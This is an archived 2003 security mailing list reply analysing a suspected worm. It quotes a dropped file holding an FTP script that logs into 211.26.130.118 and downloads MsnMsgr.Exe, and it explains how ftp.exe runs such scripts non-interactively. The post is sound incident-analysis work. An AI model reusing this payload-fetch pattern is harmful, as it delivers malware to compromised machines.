Security Incidents mailing list archives
Re: New Worm or Worm Variant?
From: Joris De Donder <joris () digitaldefense be>
Date: Thu, 11 Dec 2003 15:22:07 +0100
2) Any theories on wxtu.dll? Since I can't get a hold of the malware to analyze it, I'm really guessing at this point.
It is just a text file containing: open 211.26.130.118 USER noxe noxe binary get MsnMsgr.Exe bye
it it appears to be using something like FTPCOM to do a non-interactive FTP session
Your attacker (or his script) tries to use the ftp.exe that ships with Microsoft Windows to retreive MsnMsgr.Exe from an FTP server running at 211.26.130.118 (in your first capture). Joris --------------------------------------------------------------------------- ----------------------------------------------------------------------------
Current thread:
- New Worm or Worm Variant? Charles Hamby (Dec 10)
- Re: New Worm or Worm Variant? Harlan Carvey (Dec 11)
- Another New Worm or Worm Variant? David Gillett (Dec 11)
- Re: New Worm or Worm Variant? Juri Haberland (Dec 11)
- <Possible follow-ups>
- Re: New Worm or Worm Variant? Joris De Donder (Dec 11)
- RE: New Worm or Worm Variant? Charles Hamby (Dec 11)
- FW: New Worm or Worm Variant? Bassett, Mark (Dec 11)
- Re: New Worm or Worm Variant? Harlan Carvey (Dec 11)